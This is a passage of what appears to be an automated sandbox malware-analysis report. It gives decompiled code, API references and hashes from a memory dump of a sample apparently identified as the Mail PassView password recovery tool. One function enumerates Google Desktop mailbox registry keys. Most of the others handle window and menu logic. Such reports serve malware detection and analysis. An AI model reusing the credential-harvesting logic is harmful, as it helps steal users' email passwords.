						_t54 = E0040ADB3(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A27F(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AD9D(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x413560;
						E00401000(_t93,  &_v520, 0x412404);
						E00401000(_t93,  &_v265, 0x412440);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E00401540(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x413560
						_t54 = E0040143D(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AD38(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040AC8A(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A27F(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A27F(0, _t93, _t104, 0);
								E0040A437(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x412ff4;
								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x412ff4;
								_t54 = E0040143D( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E00408654(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}




















                                                                                                                                                    0x0040b105
                                                                                                                                                    0x0040b114
                                                                                                                                                    0x0040b11a
                                                                                                                                                    0x0040b11c
                                                                                                                                                    0x0040b120
                                                                                                                                                    0x0040b12d
                                                                                                                                                    0x0040b136
                                                                                                                                                    0x0040b13e
                                                                                                                                                    0x0040b13e
                                                                                                                                                    0x0040b144
                                                                                                                                                    0x0040b149
                                                                                                                                                    0x0040b14b
                                                                                                                                                    0x0040b14b
                                                                                                                                                    0x0040b150
                                                                                                                                                    0x0040b155
                                                                                                                                                    0x0040b157
                                                                                                                                                    0x0040b157
                                                                                                                                                    0x0040b15c
                                                                                                                                                    0x0040b161
                                                                                                                                                    0x0040b165
                                                                                                                                                    0x0040b165
                                                                                                                                                    0x0040b170
                                                                                                                                                    0x0040b178
                                                                                                                                                    0x0040b17e
                                                                                                                                                    0x0040b17e
                                                                                                                                                    0x0040b189
                                                                                                                                                    0x0040b18d
                                                                                                                                                    0x0040b18d
                                                                                                                                                    0x0040b198
                                                                                                                                                    0x0040b1a3
                                                                                                                                                    0x0040b1ab
                                                                                                                                                    0x0040b1bc
                                                                                                                                                    0x0040b1c1
                                                                                                                                                    0x0040b1c5
                                                                                                                                                    0x0040b1cf
                                                                                                                                                    0x0040b1d2
                                                                                                                                                    0x0040b1d3
                                                                                                                                                    0x0040b1e4
                                                                                                                                                    0x0040b1ea
                                                                                                                                                    0x0040b1ee
                                                                                                                                                    0x0040b1f3
                                                                                                                                                    0x0040b1f3
                                                                                                                                                    0x0040b1f5
                                                                                                                                                    0x0040b1f9
                                                                                                                                                    0x0040b1fe
                                                                                                                                                    0x0040b202
                                                                                                                                                    0x0040b202
                                                                                                                                                    0x0040b20c
                                                                                                                                                    0x0040b23d
                                                                                                                                                    0x0040b23d
                                                                                                                                                    0x0040b242
                                                                                                                                                    0x0040b268
                                                                                                                                                    0x0040b268
                                                                                                                                                    0x0040b26d
                                                                                                                                                    0x0040b271
                                                                                                                                                    0x0040b271
                                                                                                                                                    0x0040b276
                                                                                                                                                    0x0040b27b
                                                                                                                                                    0x0040b27d
                                                                                                                                                    0x0040b285
                                                                                                                                                    0x0040b28b
                                                                                                                                                    0x0040b29d
                                                                                                                                                    0x0040b29e
                                                                                                                                                    0x0040b2a3
                                                                                                                                                    0x0040b2a3
                                                                                                                                                    0x0040b2a3
                                                                                                                                                    0x0040b2a5
                                                                                                                                                    0x0040b2ab
                                                                                                                                                    0x0040b2b0
                                                                                                                                                    0x0040b2b0
                                                                                                                                                    0x0040b2b5
                                                                                                                                                    0x0040b2bb
                                                                                                                                                    0x0040b2c3
                                                                                                                                                    0x0040b2c7
                                                                                                                                                    0x0040b2c9
                                                                                                                                                    0x0040b2ce
                                                                                                                                                    0x0040b2e1
                                                                                                                                                    0x0040b2e1
                                                                                                                                                    0x0040b2e7
                                                                                                                                                    0x0040b2ed
                                                                                                                                                    0x0040b2f3
                                                                                                                                                    0x0040b2f3
                                                                                                                                                    0x0040b2f8
                                                                                                                                                    0x0040b2fe
                                                                                                                                                    0x0040b306
                                                                                                                                                    0x0040b30f
                                                                                                                                                    0x0040b329
                                                                                                                                                    0x0040b330
                                                                                                                                                    0x0040b334
                                                                                                                                                    0x0040b339
                                                                                                                                                    0x0040b339
                                                                                                                                                    0x0040b33d
                                                                                                                                                    0x0040b343
                                                                                                                                                    0x0040b34b
                                                                                                                                                    0x0040b34b
                                                                                                                                                    0x0040b350
                                                                                                                                                    0x0040b356
                                                                                                                                                    0x0040b364
                                                                                                                                                    0x0040b364
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b356
                                                                                                                                                    0x0040b244
                                                                                                                                                    0x0040b24a
                                                                                                                                                    0x0040b250
                                                                                                                                                    0x0040b263
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b263
                                                                                                                                                    0x0040b252
                                                                                                                                                    0x0040b257
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b20e
                                                                                                                                                    0x0040b20e
                                                                                                                                                    0x0040b21a
                                                                                                                                                    0x0040b238
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b238
                                                                                                                                                    0x0040b21c
                                                                                                                                                    0x0040b221
                                                                                                                                                    0x0040b226
                                                                                                                                                    0x0040b226
                                                                                                                                                    0x0040b228
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b228
                                                                                                                                                    0x0040b369
                                                                                                                                                    0x0040b369
                                                                                                                                                    0x0040b36f
                                                                                                                                                    0x0040b36f

                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0040B13E
                                                                                                                                                    • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                    • String ID: `5A
                                                                                                                                                    • API String ID: 3502187192-343712130
                                                                                                                                                    • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                                                                                    • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                                                                                                    • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                                                                                    • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405CEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E0040173B(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
					E0040169B(_t58, _v8, 1, 1, 1, 0);
					E0040169B(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E004015AE(_t66, _a4, _a8, _a12);
			}










                                                                                                                                                    0x00405cf1
                                                                                                                                                    0x00405cf2
                                                                                                                                                    0x00405cf9
                                                                                                                                                    0x00405cfb
                                                                                                                                                    0x00405cfe
                                                                                                                                                    0x00405df3
                                                                                                                                                    0x00405e0c
                                                                                                                                                    0x00405e11
                                                                                                                                                    0x00405e11
                                                                                                                                                    0x00405df5
                                                                                                                                                    0x00405df5
                                                                                                                                                    0x00405df8
                                                                                                                                                    0x00405dff
                                                                                                                                                    0x00405dff
                                                                                                                                                    0x00405d04
                                                                                                                                                    0x00405d07
                                                                                                                                                    0x00405d0f
                                                                                                                                                    0x00405d1d
                                                                                                                                                    0x00405d23
                                                                                                                                                    0x00405d35
                                                                                                                                                    0x00405d47
                                                                                                                                                    0x00405d59
                                                                                                                                                    0x00405d6b
                                                                                                                                                    0x00405d7d
                                                                                                                                                    0x00405d8f
                                                                                                                                                    0x00405da1
                                                                                                                                                    0x00405db3
                                                                                                                                                    0x00405dc1
                                                                                                                                                    0x00405dd0
                                                                                                                                                    0x00405dd8
                                                                                                                                                    0x00405de3
                                                                                                                                                    0x00405de9
                                                                                                                                                    0x00405dec
                                                                                                                                                    0x00405e29

                                                                                                                                                    APIs
                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                                                                                                      • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                                                                                                      • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                                                                                                      • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                    • String ID: $
                                                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                                                    • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                                                                                    • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                                                                                                                    • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                                                                                    • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040719C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040719C(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040EC05(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E0040706C(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040EC05(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















                                                                                                                                                    0x0040719c
                                                                                                                                                    0x004071b9
                                                                                                                                                    0x004071be
                                                                                                                                                    0x004071c3
                                                                                                                                                    0x004071ca
                                                                                                                                                    0x004071d2
                                                                                                                                                    0x004071d7
                                                                                                                                                    0x004071dc
                                                                                                                                                    0x004071e9
                                                                                                                                                    0x00407237
                                                                                                                                                    0x00407237
                                                                                                                                                    0x0040723c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407204
                                                                                                                                                    0x00407209
                                                                                                                                                    0x0040720e
                                                                                                                                                    0x0040721c
                                                                                                                                                    0x00407225
                                                                                                                                                    0x00407225
                                                                                                                                                    0x0040722c
                                                                                                                                                    0x00407232
                                                                                                                                                    0x00407232
                                                                                                                                                    0x00407242
                                                                                                                                                    0x00407242
                                                                                                                                                    0x00407249

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    • memset.MSVCRT ref: 004071D7
                                                                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                                                                    • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                                                                                    • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                                                                                                                    • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                                                                                    • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B70A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040B70A(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t15;
				struct HWND__* _t20;

				_t15 =  *0x416b94; // 0x400000
				_v44.hInstance = _t15;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E004017C1;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
				 *(__esi + 0x108) = _t20;
				return _t20;
			}






                                                                                                                                                    0x0040b710
                                                                                                                                                    0x0040b715
                                                                                                                                                    0x0040b71e
                                                                                                                                                    0x0040b727
                                                                                                                                                    0x0040b72e
                                                                                                                                                    0x0040b731
                                                                                                                                                    0x0040b738
                                                                                                                                                    0x0040b73b
                                                                                                                                                    0x0040b73e
                                                                                                                                                    0x0040b741
                                                                                                                                                    0x0040b748
                                                                                                                                                    0x0040b74b
                                                                                                                                                    0x0040b776
                                                                                                                                                    0x0040b77c
                                                                                                                                                    0x0040b784

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassCreateRegisterWindow
                                                                                                                                                    • String ID: Mail PassView$MailPassView
                                                                                                                                                    • API String ID: 3469048531-1277648965
                                                                                                                                                    • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                                                                                    • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                                                                                                                    • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                                                                                    • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401085 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00401085(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x417388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}






                                                                                                                                                    0x00401098
                                                                                                                                                    0x004010a4
                                                                                                                                                    0x004010bd
                                                                                                                                                    0x004010c3
                                                                                                                                                    0x004010cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004010e0
                                                                                                                                                    0x004010e4

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                                                                      • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                    • API String ID: 4251605573-168460110
                                                                                                                                                    • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                                                                                    • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                                                                                                    • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                                                                                    • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DE43 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040DE43(void** __eax, struct HWND__* _a4) {
				int _t6;
				void** _t10;

				_t10 = __eax;
				if( *0x417510 == 0) {
					memcpy(0x416e70,  *__eax, 0x50);
					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
					 *0x417510 = 1;
					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
					 *0x417510 =  *0x417510 & 0x00000000;
					 *0x416b9c = _t6;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                                                    0x0040de4b
                                                                                                                                                    0x0040de4d
                                                                                                                                                    0x0040de5d
                                                                                                                                                    0x0040de6f
                                                                                                                                                    0x0040de8d
                                                                                                                                                    0x0040de93
                                                                                                                                                    0x0040de99
                                                                                                                                                    0x0040dea0
                                                                                                                                                    0x0040dea8
                                                                                                                                                    0x0040de4f
                                                                                                                                                    0x0040de53
                                                                                                                                                    0x0040de53

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$DialogParam
                                                                                                                                                    • String ID: V7
                                                                                                                                                    • API String ID: 392721444-2959985473
                                                                                                                                                    • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                                                                                    • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                                                                                                    • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                                                                                    • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004062D1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E004062D1(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L004115B2();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                                                                                                                                    0x004062ea
                                                                                                                                                    0x004062f1
                                                                                                                                                    0x00406304
                                                                                                                                                    0x0040630a
                                                                                                                                                    0x00406310
                                                                                                                                                    0x00406315
                                                                                                                                                    0x00406316
                                                                                                                                                    0x0040631f
                                                                                                                                                    0x00406324

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004062F1
                                                                                                                                                    • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                                                                                    • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName_stricmpmemset
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 3665161774-2167791130
                                                                                                                                                    • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                                                                                    • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                                                                                                    • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                                                                                    • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EDAC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
